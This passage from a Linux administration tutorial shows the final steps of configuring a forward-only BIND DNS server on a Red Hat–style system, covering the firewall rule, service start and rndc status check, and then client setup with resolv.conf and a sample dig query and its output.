           // Optional. A forward-only server caches values and queries forwarders, but it never queries anyone else. If the forwarders do not respond, queries will fail.
           forward only;


4) Check the config files for errors.
[root@meru ~]# named-checkconf


5) Open Firewall Port
[root@meru ~]# firewall-cmd --zone=public --add-service=dns --permanent
[root@meru ~]# firewall-cmd --reload


6) Start the DNS Server
[root@meru ~]# systemctl start named

7) Enable on boot
[root@meru ~]# systemctl enable named

8) Check status
[root@meru ~]# rndc status
        CPUs found: 4
        worker threads: 4
        UDP listeners per interface: 4
        number of zones: 104
        recursive clients: 0/0/1000
        tcp clients: 0/100
        server is up and running



Client Configuration

1) Install package
[root@server2 ~]# yum -y install bind-utils

2) Edit the file '/etc/resolv.conf'. Add the following line
          nameserver 192.168.122.1

3) Query the DNS Server
[root@server2 ~]# dig @192.168.122.1 www.google.com

; <<>> DiG 9.9.4-RedHat-9.9.4-14.el7 <<>> www.google.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 51202
;; flags: qr rd ra; QUERY: 1, ANSWER: 5, AUTHORITY: 13, ADDITIONAL: 16

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;www.google.com.            IN    A

;; ANSWER SECTION:
www.google.com.        206    IN    A    173.194.36.51
www.google.com.        206    IN    A    173.194.36.49
www.google.com.        206    IN    A    173.194.36.50
www.google.com.        206    IN    A    173.194.36.48
www.google.com.        206    IN    A    173.194.36.52

;; AUTHORITY SECTION:
com.            111341    IN    NS    m.gtld-servers.net.